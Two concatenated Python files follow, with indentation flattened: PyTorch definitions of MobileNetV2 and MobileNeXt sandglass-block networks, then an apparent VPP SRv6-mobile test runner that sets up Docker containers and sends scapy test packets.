self.pw1 = nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False)
self.bn2 = norm_layer(hidden_dim)
self.pw2 = nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)
self.bn3 = norm_layer(oup)
self.dw2 = nn.Conv2d(oup, oup, 3, stride, 1, groups=oup, bias=False)
self.bn4 = norm_layer(oup)
def forward(self, x):
y = self.dw1(x)
b, c, _, _ = y.size()
z = self.avg_pool(y).view(b, c)
z = self.fc(z).view(b, -1, 1, 1)
z = torch.clamp(z, 0, 1)
y = self.bn1(y)
y = self.act(y)
y = self.pw1(y)
y = self.bn2(y)
y = y * z
y = self.pw2(y)
y = self.bn3(y)
y = self.act(y)
        y = self.dw2(y)
y = self.bn4(y)
if self.use_res_connect:
return x + y
else:
return y
def hard_sigmoid(x, inplace: bool = False):
if inplace:
return x.add_(3.).clamp_(0., 6.).div_(6.)
else:
return F.relu6(x + 3.) / 6.
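# Worked values for the piecewise function above (not in the original file):
#   hard_sigmoid(torch.tensor(-3.)) -> 0.0
#   hard_sigmoid(torch.tensor(0.))  -> 0.5
#   hard_sigmoid(torch.tensor(3.))  -> 1.0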
class My_Sandglass_2(nn.Module):
def __init__(self, inp, oup, stride, reduce_ratio, norm_layer=None):
super(My_Sandglass_2, self).__init__()
self.stride = stride
assert stride in [1, 2]
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self.act = nn.ReLU6(inplace=True)
hidden_dim = int(round(inp / reduce_ratio))
self.use_res_connect = self.stride == 1 and inp == oup
self.dw1 = nn.Conv2d(inp, inp, 3, 1, 1, groups=inp, bias=False)
self.bn1 = norm_layer(inp)
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(inp, hidden_dim)
self.pw1 = nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False)
self.bn2 = norm_layer(hidden_dim)
self.pw2 = nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)
self.bn3 = norm_layer(oup)
self.dw2 = nn.Conv2d(oup, oup, 3, stride, 1, groups=oup, bias=False)
self.bn4 = norm_layer(oup)
def forward(self, x):
y = self.dw1(x)
b, c, _, _ = y.size()
z = self.avg_pool(y).view(b, c)
z = self.fc(z).view(b, -1, 1, 1)
# z = torch.clamp(z, 0, 1)
z = hard_sigmoid(z, inplace=True)
y = self.bn1(y)
y = self.act(y)
y = self.pw1(y)
y = self.bn2(y)
y = y * z
y = self.pw2(y)
y = self.bn3(y)
y = self.act(y)
y = self.dw2(y)
y = self.bn4(y)
if self.use_res_connect:
return x + y
else:
return y
class SELayer(nn.Module):
def __init__(self, channel, reduction=4):
super(SELayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Linear(channel, channel // reduction),
nn.ReLU(inplace=True),
nn.Linear(channel // reduction, channel))
def forward(self, x):
b, c, _, _ = x.size()
y = self.avg_pool(x).view(b, c)
y = self.fc(y).view(b, c, 1, 1)
y = torch.clamp(y, 0, 1)
return x * y
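# Illustrative usage (assumed sizes): SELayer(64)(torch.randn(2, 64, 7, 7))
# returns a (2, 64, 7, 7) tensor with each channel rescaled by a gate in [0, 1].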
class MobileNetV2(nn.Module):
def __init__(self,
num_classes=1000,
width_mult=1.0,
inverted_residual_setting=None,
round_nearest=8,
block=None,
norm_layer=None):
"""
MobileNet V2 main class
Args:
num_classes (int): Number of classes
width_mult (float): Width multiplier - adjusts number of channels in each layer by this amount
inverted_residual_setting: Network structure
round_nearest (int): Round the number of channels in each layer to be a multiple of this number
Set to 1 to turn off rounding
block: Module specifying inverted residual building block for mobilenetv2
norm_layer: Module specifying the normalization layer to use
"""
super(MobileNetV2, self).__init__()
if block is None:
block = InvertedResidual
if norm_layer is None:
norm_layer = nn.BatchNorm2d
input_channel = 32
last_channel = 1280
if inverted_residual_setting is None:
inverted_residual_setting = [
# t, c, n, s
[1, 16, 1, 1],
[6, 24, 2, 2],
[6, 32, 3, 2],
[6, 64, 4, 2],
[6, 96, 3, 1],
[6, 160, 3, 2],
[6, 320, 1, 1],
]
# only check the first element, assuming user knows t,c,n,s are required
if len(inverted_residual_setting) == 0 or len(inverted_residual_setting[0]) != 4:
raise ValueError("inverted_residual_setting should be non-empty "
"or a 4-element list, got {}".format(inverted_residual_setting))
# building first layer
input_channel = _make_divisible(input_channel * width_mult, round_nearest)
self.last_channel = _make_divisible(last_channel * max(1.0, width_mult), round_nearest)
features = [ConvBNReLU(3, input_channel, stride=2, norm_layer=norm_layer)]
# building inverted residual blocks
for t, c, n, s in inverted_residual_setting:
output_channel = _make_divisible(c * width_mult, round_nearest)
for i in range(n):
stride = s if i == 0 else 1
features.append(block(input_channel, output_channel, stride, t, norm_layer=norm_layer))
input_channel = output_channel
# building last several layers
features.append(ConvBNReLU(input_channel, self.last_channel, kernel_size=1, norm_layer=norm_layer))
# make it nn.Sequential
self.features = nn.Sequential(*features)
# building classifier
self.classifier = nn.Sequential(
nn.Dropout(0.2),
# the features end in a 1x1 ConvBNReLU producing self.last_channel channels,
# so the classifier input must match it (output_channel would shape-mismatch)
nn.Linear(self.last_channel, num_classes),
)
# weight initialization
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out')
if m.bias is not None:
nn.init.zeros_(m.bias)
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.ones_(m.weight)
nn.init.zeros_(m.bias)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.zeros_(m.bias)
def _forward_impl(self, x):
# This exists since TorchScript doesn't support inheritance, so the superclass method
# (this one) needs to have a name other than `forward` that can be accessed in a subclass
x = self.features(x)
# Cannot use "squeeze" as batch-size can be 1 => must use reshape with x.shape[0]
x = nn.functional.adaptive_avg_pool2d(x, 1).reshape(x.shape[0], -1)
x = self.classifier(x)
return x
def forward(self, x):
return self._forward_impl(x)
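# Illustrative smoke test (assumed input size):
#   logits = MobileNetV2()(torch.randn(1, 3, 224, 224))  # -> shape (1, 1000)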
class MobileNetV2_sandglass(nn.Module):
def __init__(self,
num_classes=1000,
width_mult=1.0,
inverted_residual_setting=None,
round_nearest=8,
block=None,
norm_layer=None):
"""
MobileNet V2 (sandglass-block variant) main class
Args:
num_classes (int): Number of classes
width_mult (float): Width multiplier - adjusts number of channels in each layer by this amount
inverted_residual_setting: Network structure
round_nearest (int): Round the number of channels in each layer to be a multiple of this number
Set to 1 to turn off rounding
block: Module specifying inverted residual building block for mobilenetv2
norm_layer: Module specifying the normalization layer to use
"""
super(MobileNetV2_sandglass, self).__init__()
if block is None:
block = Sandglass
if norm_layer is None:
norm_layer = nn.BatchNorm2d
input_channel = 32
last_channel = 1280
if inverted_residual_setting is None:
inverted_residual_setting = [
# t, c, n, s
[1, 16, 1, 1],
[6, 24, 2, 2],
[6, 32, 3, 2],
[6, 64, 4, 2],
[6, 96, 3, 1],
[6, 160, 3, 2],
# [6, 320, 1, 1],
]
# only check the first element, assuming user knows t,c,n,s are required
if len(inverted_residual_setting) == 0 or len(inverted_residual_setting[0]) != 4:
raise ValueError("inverted_residual_setting should be non-empty "
"or a 4-element list, got {}".format(inverted_residual_setting))
# building first layer
input_channel = _make_divisible(input_channel * width_mult, round_nearest)
self.last_channel = _make_divisible(last_channel * max(1.0, width_mult), round_nearest)
features = [ConvBNReLU(3, input_channel, stride=2, norm_layer=norm_layer)]
# building inverted residual blocks
for t, c, n, s in inverted_residual_setting:
output_channel = _make_divisible(c * t * width_mult, round_nearest)
for i in range(n):
stride = s if i == 0 else 1
features.append(block(input_channel, output_channel, stride, t, norm_layer=norm_layer))
input_channel = output_channel
features.extend(
[ConvBNReLU(960, 960, stride=1, groups=960, norm_layer=norm_layer),
# pw-linear
nn.Conv2d(960, 320, 1, 1, 0, bias=False),
norm_layer(320),]
)
# building last several layers (the pw-linear above reduces to 320 channels,
# so the final 1x1 ConvBNReLU must take 320 inputs, not input_channel)
features.append(ConvBNReLU(320, self.last_channel, kernel_size=1, norm_layer=norm_layer))
# make it nn.Sequential
self.features = nn.Sequential(*features)
# building classifier
self.classifier = nn.Sequential(
nn.Dropout(0.2),
nn.Linear(self.last_channel, num_classes),
)
# weight initialization
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out')
if m.bias is not None:
nn.init.zeros_(m.bias)
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.ones_(m.weight)
nn.init.zeros_(m.bias)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.zeros_(m.bias)
def _forward_impl(self, x):
# This exists since TorchScript doesn't support inheritance, so the superclass method
# (this one) needs to have a name other than `forward` that can be accessed in a subclass
x = self.features(x)
# Cannot use "squeeze" as batch-size can be 1 => must use reshape with x.shape[0]
x = nn.functional.adaptive_avg_pool2d(x, 1).reshape(x.shape[0], -1)
x = self.classifier(x)
return x
def forward(self, x):
return self._forward_impl(x)
class MobileNeXt(nn.Module):
def __init__(self,
num_classes=1000,
width_mult=1.0,
sandglass_setting=None,
round_nearest=8,
block=None,
norm_layer=None):
"""
MobileNeXt main class
Args:
num_classes (int): Number of classes
width_mult (float): Width multiplier - adjusts number of channels in each layer by this amount
sandglass_setting: Network structure
round_nearest (int): Round the number of channels in each layer to be a multiple of this number
Set to 1 to turn off rounding
block: Module specifying the sandglass building block for MobileNeXt
norm_layer: Module specifying the normalization layer to use
"""
super(MobileNeXt, self).__init__()
if block is None:
block = Sandglass
if norm_layer is None:
norm_layer = nn.BatchNorm2d
input_channel = 32
last_channel = 1280
if sandglass_setting is None:
sandglass_setting = [
# t, c, n, s
[2, 96, 1, 2],
[6, 144, 1, 1],
[6, 192, 3, 2],
[6, 288, 3, 2],
[6, 384, 4, 1],
[6, 576, 4, 2],
[6, 960, 3, 1],  # [6, 960, 2, 1],
[6, 1280, 1, 1],
]
# only check the first element, assuming user knows t,c,n,s are required
if len(sandglass_setting) == 0 or len(sandglass_setting[0]) != 4:
raise ValueError("sandglass_setting should be non-empty "
"or a 4-element list, got {}".format(sandglass_setting))
# building first layer
input_channel = _make_divisible(input_channel * width_mult, round_nearest)
self.last_channel = _make_divisible(last_channel * max(1.0, width_mult), round_nearest)
features = [ConvBNReLU(3, input_channel, stride=2, norm_layer=norm_layer)]
# building sandglass blocks
for t, c, n, s in sandglass_setting:
output_channel = _make_divisible(c * width_mult, round_nearest)
for i in range(n):
stride = s if i == 0 else 1
features.append(block(input_channel, output_channel, stride, t, norm_layer=norm_layer))
input_channel = output_channel
# make it nn.Sequential
self.features = nn.Sequential(*features)
# building classifier
self.classifier = nn.Sequential(
nn.Dropout(0.2),
nn.Linear(self.last_channel, num_classes),
)
# weight initialization
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out')
if m.bias is not None:
nn.init.zeros_(m.bias)
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.ones_(m.weight)
nn.init.zeros_(m.bias)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.zeros_(m.bias)
def _forward_impl(self, x):
# This exists since TorchScript doesn't support inheritance, so the superclass method
# (this one) needs to have a name other than `forward` that can be accessed in a subclass
x = self.features(x)
# Cannot use "squeeze" as batch-size can be 1 => must use reshape with x.shape[0]
x = nn.functional.adaptive_avg_pool2d(x, 1).reshape(x.shape[0], -1)
x = self.classifier(x)
return x
def forward(self, x):
return self._forward_impl(x)
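# Illustrative check (assumed input size): MobileNeXt()(torch.randn(1, 3, 224, 224))
# -> shape (1, 1000); the last sandglass stage outputs 1280 channels, matching
# self.last_channel used by the classifier.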
def mobilenetv2_sandglass(**kwargs):
sandglass_setting = [
# t, c, n, s
[1, 16, 1, 1],
[6, 144, 2, 2],
[6, 192, 3, 2],
[6, 384, 4, 2],
[6, 576, 3, 1],
[6, 960, 3, 2],
[6, 1920, 1, 1],
# [1, 16, 1, 1],
# [6, 24, 2, 2],
# [6, 32, 3, 2],
# [6, 64, 4, 2],
# [6, 96, 3, 1],
# [6, 160, 3, 2],
# [6, 320, 1, 1],
]
block = Sandglass
return MobileNetV2(inverted_residual_setting=sandglass_setting, block=block, **kwargs)
def my_mobilenext(**kwargs):
block = My_Sandglass
return MobileNeXt(block=block, **kwargs)
def my_mobilenext_2(**kwargs):
block = My_Sandglass_2
return MobileNeXt(block=block, **kwargs)
if __name__=='__main__':
import torch
from torchvision import models
model = MobileNeXt()
print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
print(len(list(model.modules())))
# model = my_mobilenext()
# print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
# print(len(list(model.modules())))
# model = MobileNetV2()
# print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
# print(len(list(model.modules())))
# model = models.mobilenet_v2(pretrained=False, width_mult=1.0)
# print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
# print(len(list(model.modules())))
# model =mobilenetv2_sandglass()
# print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
# print(len(list(model.modules())))
# model = MobileNetV2_sandglass()
# print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
# print(len(list(model.modules())))
# model = InvertedResidual(32, 32, 1, 6)
# print('InvertedResidual params: %.f' % (sum(p.numel() for p in model.parameters())))
# print(len(list(model.modules())))
# print(model)
# model = Sandglass(192, 192, 1, 6)
# print('Sandglass params: %.f' % (sum(p.numel() for p in model.parameters())))
# print(len(list(model.modules())))
# # print(model)
# model = My_Sandglass(192, 192, 1, 6)
# print('Sandglass params: %.f' % (sum(p.numel() for p in model.parameters())))
# print(len(list(model.modules())))
# print(model)
# model.eval()
# # print(model)
x = torch.randn(1, 3, 224, 224)  # renamed from `input` to avoid shadowing the built-in
# y = model(x)
# # print(y.shape)
# print('Total params: %f M' % (sum(p.numel() for p in model.parameters())/ 1024. / 1024.0))
from thop import profile
flops, params = profile(model, inputs=[x])
print(flops)
print(params)
print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
# --- next file: src/plugins/srv6-mobile/extra/runner.py (repo cscnull/vpp @ c95eefb3, Apache-2.0) ---
#!/usr/bin/env python3
from os.path import dirname, realpath, split,\
join, isdir, exists
from os import remove, system, mkdir
from logging import getLogger, basicConfig,\
DEBUG, INFO, ERROR
from argparse import ArgumentParser
from atexit import register
from shutil import rmtree
from jinja2 import Environment, FileSystemLoader
from docker.errors import NotFound, APIError
from docker import from_env
from scapy.contrib.gtp import *
from scapy.all import *
import time  # time.sleep is used throughout; not reliably re-exported by scapy
verbose_levels = {
'error': ERROR,
'debug': DEBUG,
'info': INFO}
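# Illustrative: basicConfig(level=verbose_levels["debug"]) would enable debug logging.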
class ContainerStartupError(Exception):
pass
class Container(object):
tmp = "/tmp"
cmd = "vppctl -s 0:5002"
cmd_bash = "/bin/bash"
def __init__(self, ref, name):
self._name = name
self._ref = ref
@property
def name(self):
return self._name
@property
def temp(self):
return join(self.tmp, self.name)
@property
def pg_input_file(self):
return join(self.temp, "pgi.pcap")
@property
def pg_output_file(self):
return join(self.temp, "pgo.pcap")
@property
def pg_input_file_in(self):
return join("/mnt", "pgi.pcap")
@property
def pg_output_file_in(self):
return join("/mnt", "pgo.pcap")
def disconnect_all(self):
status = False
for net in self._ref.client.networks.list():
try:
net.disconnect(self._ref)
except APIError:
continue
status = True
return status
@classmethod
def new(cls, client, image, name):
temp = join(cls.tmp, name)
if isdir(temp):
rmtree(temp)
mkdir(temp)
ref = client.containers.run(
detach=True,
remove=True,
auto_remove=True,
image=image,
name=name,
privileged=True,
volumes={
temp: {
'bind': '/mnt',
'mode': 'rw'}})
obj = cls.get(client, name)
if not obj:
raise ContainerStartupError()
obj.disconnect_all()
return obj
@classmethod
def get(cls, client, name):
try:
ref = client.containers.get(name)
except NotFound:
pass
else:
return cls(ref, name)
def rem(self):
self._ref.kill()
def vppctl(self):
system("docker exec -it {} {}".format(self.name, self.cmd))
def bash(self):
system("docker exec -it {} {}".format(self.name, self.cmd_bash))
def vppctl_exec(self, cmd):
ec, resp = self._ref.exec_run(cmd="{} {}".format(self.cmd, cmd))
assert ec == 0
return resp
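# Illustrative usage: container.vppctl_exec("show int addr") runs the command
# through "vppctl -s 0:5002" inside the container and returns its raw byte output.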
def setup_host_interface(self, name, ip):
self.vppctl_exec("create host-interface name {}".format(name))
self.vppctl_exec("set int ip addr host-{} {}".format(name, ip))
self.vppctl_exec("set int state host-{} up".format(name))
def pg_create_interface(self, local_ip, remote_ip, local_mac, remote_mac):
# remote_ip can't have subnet mask
time.sleep(2)
self.vppctl_exec("create packet-generator interface pg0")
self.vppctl_exec("set int mac address pg0 {}".format(local_mac))
self.vppctl_exec("set int ip addr pg0 {}".format(local_ip))
self.vppctl_exec(
"set ip neighbor pg0 {} {}".format(remote_ip, remote_mac))
self.vppctl_exec("set int state pg0 up")
def pg_create_interface4(self, local_ip, remote_ip, local_mac, remote_mac):
# remote_ip can't have subnet mask
time.sleep(2)
self.vppctl_exec("create packet-generator interface pg0")
self.vppctl_exec("set int mac address pg0 {}".format(local_mac))
self.vppctl_exec("set int ip addr pg0 {}".format(local_ip))
self.vppctl_exec("set ip neighbor pg0 {} {}".format(remote_ip, remote_mac))
self.vppctl_exec("set int state pg0 up")
def pg_create_interface6(self, local_ip, remote_ip, local_mac, remote_mac):
# remote_ip can't have subnet mask
time.sleep(2)
self.vppctl_exec("create packet-generator interface pg0")
self.vppctl_exec("set int mac address pg0 {}".format(local_mac))
self.vppctl_exec("set int ip addr pg0 {}".format(local_ip))
self.vppctl_exec("set ip neighbor pg0 {} {}".format(remote_ip, remote_mac))
self.vppctl_exec("set int state pg0 up")
def pg_create_interface4_name(self, ifname, local_ip, remote_ip, local_mac, remote_mac):
# remote_ip can't have subnet mask
time.sleep(2)
self.vppctl_exec("create packet-generator interface {}".format(ifname))
self.vppctl_exec("set int mac address {} {}".format(ifname, local_mac))
self.vppctl_exec("set int ip addr {} {}".format(ifname, local_ip))
self.vppctl_exec("set ip neighbor {} {} {}".format(ifname, remote_ip, remote_mac))
self.vppctl_exec("set int state {} up".format(ifname))
def pg_create_interface6_name(self, ifname, local_ip, remote_ip, local_mac, remote_mac):
# remote_ip can't have subnet mask
time.sleep(2)
self.vppctl_exec("create packet-generator interface {}".format(ifname))
self.vppctl_exec("set int mac address {} {}".format(ifname, local_mac))
self.vppctl_exec("set int ip addr {} {}".format(ifname, local_ip))
self.vppctl_exec("set ip neighbor {} {} {}".format(ifname, remote_ip, remote_mac))
self.vppctl_exec("set int state {} up".format(ifname))
def pg_enable(self):
# start packet generator
self.vppctl_exec("packet-generator enable")
def pg_create_stream(self, stream):
wrpcap(self.pg_input_file, stream)
self.vppctl_exec(
"packet-generator new name pg-stream "
"node ethernet-input pcap {}".format(
self.pg_input_file_in))
def pg_start_capture(self):
if exists(self.pg_output_file):
remove(self.pg_output_file)
self.vppctl_exec(
"packet-generator capture pg0 pcap {}".format(
self.pg_output_file_in))
def pg_start_capture_name(self, ifname):
if exists(self.pg_output_file):
remove(self.pg_output_file)
self.vppctl_exec(
"packet-generator capture {} pcap {}".format(
ifname, self.pg_output_file_in))
def pg_read_packets(self):
return rdpcap(self.pg_output_file)
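# Illustrative capture workflow (the ordering the tests below rely on):
#   c.pg_start_capture(); c.pg_create_stream(pkt); c.pg_enable()
#   ... give VPP time to replay ...; received = c.pg_read_packets()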
def set_ipv6_route(self, out_if_name, next_hop_ip, subnet):
self.vppctl_exec(
"ip route add {} via host-{} {}".format(
subnet, out_if_name, next_hop_ip))
def set_ipv6_route2(self, out_if_name, next_hop_ip, subnet):
self.vppctl_exec(
"ip route add {} via {} {}".format(
subnet, out_if_name, next_hop_ip))
def set_ip_pgroute(self, out_if_name, next_hop_ip, subnet):
self.vppctl_exec("ip route add {} via {} {}".format(
subnet, out_if_name, next_hop_ip))
def set_ipv6_pgroute(self, out_if_name, next_hop_ip, subnet):
self.vppctl_exec("ip route add {} via {} {}".format(
subnet, out_if_name, next_hop_ip))
def set_ipv6_default_route(self, out_if_name, next_hop_ip):
self.vppctl_exec(
"ip route add ::/0 via host-{} {}".format(
out_if_name, next_hop_ip))
def enable_trace(self, count):
self.vppctl_exec("trace add af-packet-input {}".format(count))
class Containers(object):
def __init__(self, client, image):
self.client = client
self.image = image
def tmp_render(self, path, template, kwargs):
with open(path, "w") as fo:
fo.write(template.render(**kwargs))
register(lambda: remove(path))
def build(self, path, vpp_path):
env = Environment(loader=FileSystemLoader(path),
trim_blocks=True)
self.tmp_render(join(vpp_path, "Dockerfile"),
env.get_template("Dockerfile.j2"),
{'vpp_path': vpp_path})
self.tmp_render(join(vpp_path, "startup.conf"),
env.get_template("startup.conf.j2"),
{'vpp_path': vpp_path})
ref, _ = self.client.images.build(path=vpp_path,
tag=self.image, rm=True)
return ref
def release(self, path, vpp_path):
env = Environment(loader=FileSystemLoader(path),
trim_blocks=True)
self.tmp_render(join(vpp_path, "Dockerfile"),
env.get_template("Dockerfile.j2.release"),
{'vpp_path': vpp_path})
self.tmp_render(join(vpp_path, "startup.conf"),
env.get_template("startup.conf.j2"),
{'vpp_path': vpp_path})
ref, _ = self.client.images.build(path=vpp_path,
tag="srv6m-release-image", rm=True)
return ref
def new(self, name):
return Container.new(self.client, self.image, name)
def get(self, name):
return Container.get(self.client, name)
def vppctl(self, name, command=None):
container = self.get(name)
if not command:
container.vppctl()
else:
print(container.vppctl_exec(command).decode())
def bash(self, name):
container = self.get(name)
container.bash()
class Network(object):
def __init__(self, ref, name):
self._name = name
self._ref = ref
@property
def name(self):
return self._name
@classmethod
def new(cls, client, name):
ref = client.networks.create(name, driver="bridge",
check_duplicate=True)
return cls(ref, name)
@classmethod
def get(cls, client, name):
try:
ref = client.networks.get(name)
except NotFound:
pass
else:
return cls(ref, name)
def rem(self):
self._ref.remove()
def connect(self, c):
self._ref.connect(c.name)
class Networks(object):
def __init__(self, client):
self.client = client
def new(self, name):
return Network.new(self.client, name)
def get(self, name):
return Network.get(self.client, name)
class Program(object):
image = "srv6m-image"
name_prefix = "hck"
# TODO: add a description to these instances,
# for example what each vpp instance is supposed to be
# in our topology overview
instance_names = ["vpp-1",
"vpp-2",
"vpp-3",
"vpp-4"]
network_names = ["net-1",
"net-2",
"net-3"]
def __init__(self, image=None, prefix=None):
self.path = dirname(realpath(__file__))
if image:
self.image = image
if prefix is not None:
self.name_prefix = prefix
client = from_env()
self.containers = Containers(client, self.image)
self.networks = Networks(client)
self.logger = getLogger(__name__)
@property
def vpp_path(self):
return self.path.rsplit("/", 4)[0]
def get_name(self, name):
if not self.name_prefix:
return name
return "{}-{}".format(self.name_prefix, name)
def stop_containers(self):
for name in self.instance_names:
instance = self.containers.get(self.get_name(name))
if instance:
instance.rem()
for name in self.network_names:
network = self.networks.get(self.get_name(name))
if network:
network.rem()
def start_containers(self):
self.stop_containers()
networks = list()
for name in self.network_names:
networks.append(self.networks.new(self.get_name(name)))
n1, n2, n3 = networks
instances = list()
for name in self.instance_names:
instances.append(self.containers.new(self.get_name(name)))
c1, c2, c3, c4 = instances
# setup packet generator interfaces
# c1.pg_create_interface(local_ip="C::1/120", remote_ip="C::2",
# local_mac="aa:bb:cc:dd:ee:01", remote_mac="aa:bb:cc:dd:ee:02")
# setup network between instances
n1.connect(c1)
n1.connect(c2)
n2.connect(c2)
n2.connect(c3)
n3.connect(c3)
n3.connect(c4)
# c1 & c2 link
c1.setup_host_interface("eth1", "A1::1/120")
c2.setup_host_interface("eth1", "A1::2/120")
# c2 & c3 link
c2.setup_host_interface("eth2", "A2::1/120")
c3.setup_host_interface("eth1", "A2::2/120")
# c3 & c4 link
c3.setup_host_interface("eth2", "A3::1/120")
c4.setup_host_interface("eth1", "A3::2/120")
# c1 > c2 default route
c1.set_ipv6_default_route("eth1", "A1::2")
# c2 > c3 default route
c2.set_ipv6_default_route("eth2", "A2::2")
# c3 > c2 default route
c3.set_ipv6_default_route("eth1", "A2::1")
# c4 > c3 default route
c4.set_ipv6_default_route("eth1", "A3::1")
# c3 > c4 static route for address B::1/128
c3.set_ipv6_route("eth2", "A3::2", "B::1/128")
c3.set_ipv6_route("eth2", "A3::2", "B::2/128")
def test_ping(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="B::2") / ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_srv6(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 C::1/120
# pg interface on c4 B::1/120
self.start_containers()
print("Sleeping")
time.sleep(30)
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr D1::")
c1.vppctl_exec(
"sr policy add bsid D1::999:1 next D2:: next D3:: next D4::")
c1.vppctl_exec("sr steer l3 B::/120 via bsid D1::999:1")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid address D4:: behavior end.dx6 pg0 B::2")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/128")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="B::2") / ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c2.enable_trace(10)
c3.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
''' T.Map is obsolete
def test_tmap(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec(
"sr policy add bsid D1:: next D2:: next D3:: "
"gtp4_removal sr_prefix D4::/32 v6src_prefix C1::/64")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D1::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_tmap_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
